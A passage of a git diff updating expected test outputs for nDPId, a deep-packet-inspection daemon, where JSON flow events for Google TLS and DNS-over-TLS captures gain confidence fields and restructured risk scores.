 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1434443394851,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1434443394851,"pkt":"AA6OTbSogMbKAJ6fCABFAAAoBqNAAEAG146sHwPg2DrUZKdTAbt6Z3Lr7iMRFFAQFtCmzAAA"}
-00616{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":28,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":1434443394683,"flow_last_seen":1434443401353,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":7568,"flow_avg_l4_payload_len":270,"midstream":0,"ts_msec":1434443401353,"l3_proto":"ip4","src_ip":"172.31.3.224","dst_ip":"216.58.212.100","src_port":42835,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":28,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":1434443394683,"flow_last_seen":1434443401353,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":7568,"flow_avg_l4_payload_len":270,"midstream":0,"ts_msec":1434443401353,"l3_proto":"ip4","src_ip":"172.31.3.224","dst_ip":"216.58.212.100","src_port":42835,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":28,"source":"google_ssl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":28,"flow_first_seen":1434443394683,"flow_last_seen":1434443401353,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1430,"flow_tot_l4_payload_len":7568,"flow_avg_l4_payload_len":270,"midstream":0,"ts_msec":1434443401353,"l3_proto":"ip4","src_ip":"172.31.3.224","dst_ip":"216.58.212.100","src_port":42835,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00158{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":28,"source":"google_ssl.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
@@ -14,10 +14,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4597689 bytes
-~~ total memory freed........: 4597689 bytes
-~~ total allocations/frees...: 99582/99582
+~~ total memory allocated....: 4682642 bytes
+~~ total memory freed........: 4682642 bytes
+~~ total allocations/frees...: 101172/101172
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 163 chars
-~~ json string max len.......: 621 chars
-~~ json string avg len.......: 457 chars
+~~ json string max len.......: 655 chars
+~~ json string avg len.......: 472 chars
diff --git a/test/results/googledns_android10.pcap.out b/test/results/googledns_android10.pcap.out
index 6909ceaf5..c72a604b9 100644
--- a/test/results/googledns_android10.pcap.out
+++ b/test/results/googledns_android10.pcap.out
@@ -10,23 +10,23 @@
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1592552825926,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1592552825926,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8q2cAAHcGygEICAQEwKgBnwNVu6wOvAEKE7F4oqAS6yBkegAAAgQFZAQCCAp\/X4MU\/\/\/MwQEDAwg="}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1592552825927,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1592552825927,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8xdcAAHYGrI0ICAgIwKgBnwNV2tjD\/e2fl7AEwaAS6yBjdQAAAgQFZAQCCApkDcpF\/\/\/MwQEDAwg="}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1592552825928,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1592552825928,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA0tGFAAEAGuA\/AqAGfCAgEBLusA1UTsXiiDrwBC4AQAVd8vQAAAQEICv\/\/zMV\/X4MU"}
-00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552825913,"flow_last_seen":1592552825928,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1592552825928,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552825913,"flow_last_seen":1592552825928,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1592552825928,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1592552825929,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1592552825929,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA0yAJAAEAGoGrAqAGfCAgICNrYA1WXsATBw\/3toIAQAVd7uAAAAQEICv\/\/zMVkDcpF"}
-00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552825913,"flow_last_seen":1592552825929,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1592552825929,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00904{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":15,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552825913,"flow_last_seen":1592552825957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"ts_msec":1592552825957,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
-01305{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592552825913,"flow_last_seen":1592552825957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"ts_msec":1592552825957,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}}
-00904{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552825913,"flow_last_seen":1592552825959,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"ts_msec":1592552825959,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
-01305{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":19,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592552825913,"flow_last_seen":1592552825960,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"ts_msec":1592552825960,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}}
+00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552825913,"flow_last_seen":1592552825929,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1592552825929,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":15,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552825913,"flow_last_seen":1592552825957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"ts_msec":1592552825957,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
+01411{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592552825913,"flow_last_seen":1592552825957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"ts_msec":1592552825957,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}}
+01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552825913,"flow_last_seen":1592552825959,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"ts_msec":1592552825959,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
+01411{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":19,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592552825913,"flow_last_seen":1592552825960,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"ts_msec":1592552825960,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552826036,"flow_last_seen":1592552826036,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1592552826036,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1592552826036,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1592552826036,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA80uBAAEAGmYjAqAGfCAgEBLuwA1WtLB4AAAAAAKAC\/\/8imQAAAgQFtAQCCAr\/\/8zgAAAAAAEDAwg="}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1592552826049,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1592552826049,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8wHkAAHcGtO8ICAQEwKgBnwNVu7B94BEWrSweAaAS6yCziAAAAgQFZAQCCAq0eUC+\/\/\/M4AEDAwg="}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1592552826051,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1592552826051,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA00uFAAEAGmY\/AqAGfCAgEBLuwA1WtLB4BfeARF4AQAVfLywAAAQEICv\/\/zOS0eUC+"}
-00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552826036,"flow_last_seen":1592552826051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1592552826051,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00904{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":52,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552826036,"flow_last_seen":1592552826080,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"ts_msec":1592552826080,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
-01305{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592552826036,"flow_last_seen":1592552826081,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"ts_msec":1592552826081,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}}
+00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552826036,"flow_last_seen":1592552826051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1592552826051,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":52,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552826036,"flow_last_seen":1592552826080,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"ts_msec":1592552826080,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
+01411{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592552826036,"flow_last_seen":1592552826081,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"ts_msec":1592552826081,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, 